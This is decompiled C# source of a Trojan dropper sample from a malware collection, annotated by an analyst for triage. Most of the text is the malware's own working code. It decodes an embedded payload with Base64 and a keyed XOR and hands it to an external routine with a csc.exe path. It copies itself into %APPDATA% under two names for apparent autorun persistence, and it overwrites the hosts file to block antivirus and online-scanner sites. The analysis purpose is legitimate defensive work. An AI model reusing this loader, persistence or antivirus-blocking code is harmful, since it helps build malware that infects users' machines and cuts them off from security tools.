// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
//
// Analyst summary (everything below is read off this file only):
//  - Main() decodes an embedded resource string (Base64, then Base64 again plus a keyed XOR) into a
//    byte buffer and passes it, together with a csc.exe path, to a routine defined in another type.
//  - It copies its own executable to %APPDATA%\KqJuyYy.exe and %APPDATA%\KEWTpM.exe and passes each
//    quoted path, with the names "BZohRyCWyD" / "nYSZDQPfjm", to another routine defined elsewhere.
//  - It replaces the hosts file with entries that point several AV / online-scanner hostnames at
//    127.0.0.1.
//  - Every try block ends in a handler that discards the exception, so failures are silent.
// Triage pointers: the two %APPDATA% file names, the two short names above, and a hosts file that
// contains only the entries written below.

using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Text;

namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
  /// <summary>
  /// Entry-point module of the sample. [StandardModule] and the ProjectData / NewLateBinding /
  /// Conversions calls come from Microsoft.VisualBasic.CompilerServices, i.e. the original was
  /// compiled from Visual Basic. Type and member names are machine-generated (obfuscated).
  /// </summary>
  [StandardModule]
  internal sealed class fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
  {
    // Resource manager bound to the resource set "duggsaogahsoghasikgasg" inside this same assembly.
    private static ResourceManager pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ = new ResourceManager("duggsaogahsoghasikgasg", Assembly.GetExecutingAssembly());

    // Encoded payload text: the resource entry "picturekashfklhaskgasg", read as a string at type
    // initialisation. Main() feeds it to Convert.FromBase64String and then to xordecrypt.
    private static string cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV =
      (string) fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ.GetObject("picturekashfklhaskgasg");

    // P/Invoke declaration for Sleep in kernel32. It is not called anywhere in this class.
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern void Sleep(long dwMilliseconds);

    /// <summary>
    /// Program entry point. In order: decodes the embedded payload, hands it to an external routine
    /// together with a csc.exe path, copies the running executable into %APPDATA% twice, and
    /// rewrites the hosts file. Each step sits in a try block whose handler only calls
    /// ProjectData.SetProjectError / ClearProjectError, so no exception leaves Main.
    /// </summary>
    [STAThread]
    public static void Main()
    {
      // Empty try body: nothing in it can throw, so this handler never runs.
      // NOTE(review): cannot tell from here whether the body was stripped or this is filler.
      try
      {
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      // Payload decode. The resource string is Base64-decoded here; xordecrypt then reads those
      // bytes as text, Base64-decodes them a second time and XORs the result with a key stream
      // derived from the bytes of "freetheweed". This statement is outside any try block, so a
      // decode failure would terminate the process with an unhandled exception.
      byte[] pByteArray = fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.xordecrypt(Convert.FromBase64String(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV), Encoding.Default.GetBytes("freetheweed"));
      // Second empty try body; same remark as the first one.
      try
      {
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      try
      {
        // The decoded buffer and the path "<first character of the system directory>:\Windows\
        // Microsoft.NET\Framework\v2.0.50727\csc.exe" go to a method of another type.
        // NOTE(review): the callee is not in this file. Passing a payload buffer together with the
        // path of a framework binary is consistent with running the payload under that binary;
        // confirm against the callee before stating it in a report.
        aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(pByteArray, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe");
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      // Everything from here to the end of Main is ONE try block: the first statement that throws
      // skips all the statements after it, and the handler discards the exception.
      try
      {
        // External routine, not visible in this file; its effect cannot be stated from here.
        gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa.rofl();
        // Self-copy #1: the file backing this assembly's first module is copied to
        // %APPDATA%\KqJuyYy.exe. File.Copy(src, dst) does not overwrite; if the destination already
        // exists it throws and the rest of this try block does not run on that host.
        File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe");
        // NOTE(review): callee not in this file. The arguments (a short random-looking name, the
        // quoted path of the copy, and an enum member named TheCurrentoftheUSER) look like an
        // autorun registration under the current-user hive; confirm against the callee.
        NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("BZohRyCWyD", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER);
        // Self-copy #2: same source file, destination %APPDATA%\KEWTpM.exe.
        File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe");
        // Same external routine, this time with the name "nYSZDQPfjm" and the enum member
        // TheLocalofMachine (presumably the machine-wide counterpart of the call above; verify).
        NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("nYSZDQPfjm", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine);
        // External routine, not visible in this file; its effect cannot be stated from here.
        HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt();
        // Hosts-file tampering. The directory comes from the DataBasePath value under
        // HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters ("oops" if the value is missing),
        // with "\hosts" appended. StreamWriter(path) opens the file for overwrite, not append, so
        // any existing hosts entries are lost; remediation means restoring the file, not only
        // deleting the lines below.
        object Instance = (object) new StreamWriter(Conversions.ToString(Registry.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "DataBasePath", (object) "oops")) + "\\hosts");
        // The writes are late-bound VB calls (NewLateBinding.LateCall) to Write on the writer,
        // alternating one hosts entry and one Environment.NewLine. Each entry maps an AV vendor or
        // online-scanner hostname to 127.0.0.1, which stops the host from resolving those sites.
        // Some entries carry a bare IPv4 literal in the hostname column.
        // NOTE(review): a hosts line maps a name to an address, so the IPv4-literal entries
        // presumably do not affect connections made directly to those addresses; verify.
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virustotal.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virustotal.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 74.53.201.162" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virscan.org" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virscan.org" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 61.180.255.138" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.virusscan.jotti.org" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 virusscan.jotti.org" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 209.160.72.83" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.kaspersky.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 kaspersky.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 38.117.98.208" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 www.bitdefender.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 bitdefender.com" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) "127.0.0.1 66.40.145.200" }, (string[]) null, (Type[]) null, (bool[]) null, true);
        NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1] { (object) Environment.NewLine }, (string[]) null, (Type[]) null, (bool[]) null, true);
        // Dispose is reached only if none of the writes above threw; there is no finally block.
        NewLateBinding.LateCall(Instance, (Type) null, "Dispose", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    /// <summary>
    /// Decodes an obfuscated buffer: <paramref name="input"/> is read as text with
    /// Encoding.Default, Base64-decoded, and every decoded byte except the last is XORed with a
    /// key-derived byte.
    /// </summary>
    /// <param name="input">Bytes holding Base64 text.</param>
    /// <param name="key">Key bytes, used cyclically (index modulo key length).</param>
    /// <returns>The decoded bytes; one byte shorter than the Base64-decoded input.</returns>
    private static byte[] xordecrypt(byte[] input, byte[] key)
    {
      byte[] numArray1 = Convert.FromBase64String(Encoding.Default.GetString(input));
      // Output holds every decoded byte except the trailing one.
      byte[] numArray2 = new byte[checked (numArray1.Length - 2 + 1)];
      // The trailing byte is not data: it is mixed into the shift count below.
      byte num1 = numArray1[checked (numArray1.Length - 1)];
      int num2 = checked (numArray2.Length - 1);
      int index = 0;
      while (index <= num2)
      {
        // Key-stream byte = key[index % key.Length] shifted left by ((index + num1 + key.Length) & 7)
        // bits, with only the low 8 bits kept by the (byte) cast; the trailing "% 256" changes nothing.
        numArray2[index] = checked ((byte) ((int) numArray1[index] ^ unchecked ((int) (byte) ((uint) key[index % key.Length] << (checked (index + (int) num1 + key.Length) & 7)) % 256)));
        checked { ++index; }
      }
      return numArray2;
    }

    /// <summary>
    /// Returns the characters of <paramref name="Value"/> in reverse order. Not called anywhere in
    /// this class.
    /// </summary>
    /// <param name="Value">String to reverse.</param>
    /// <returns>A new string with the characters of the input back to front.</returns>
    public static string ReverseString(string Value)
    {
      StringBuilder stringBuilder = new StringBuilder();
      // Walk from the last character down to index 0, appending each one.
      int index = checked (Value.Length - 1);
      while (index >= 0)
      {
        stringBuilder.Append(Value[index]);
        checked { index += -1; }
      }
      return stringBuilder.ToString();
    }
  }
}